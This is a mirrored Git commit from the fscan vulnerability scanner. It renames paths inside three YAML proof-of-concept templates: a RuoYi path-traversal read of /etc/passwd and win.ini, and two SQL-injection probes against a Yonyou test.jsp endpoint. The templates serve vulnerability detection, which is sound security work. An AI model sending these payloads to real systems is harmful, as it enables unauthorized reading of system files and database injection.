mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-24 20:21:52 +08:00
refactor: 规范化文件命名
This commit is contained in:
@@ -2,12 +2,12 @@ name: poc-yaml-ruoyi-management-fileread
|
||||
groups:
|
||||
linux:
|
||||
- method: GET
|
||||
path: /common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
windows:
|
||||
- method: GET
|
||||
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
|
||||
path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
|
||||
@@ -3,7 +3,7 @@ set:
|
||||
rand: randomInt(200000000, 210000000)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
||||
path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
||||
expression:
|
||||
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
|
||||
detail:
|
||||
|
||||
@@ -3,7 +3,7 @@ set:
|
||||
rand: randomInt(200000000, 220000000)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
||||
path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
|
||||
|
||||
Reference in New Issue
Block a user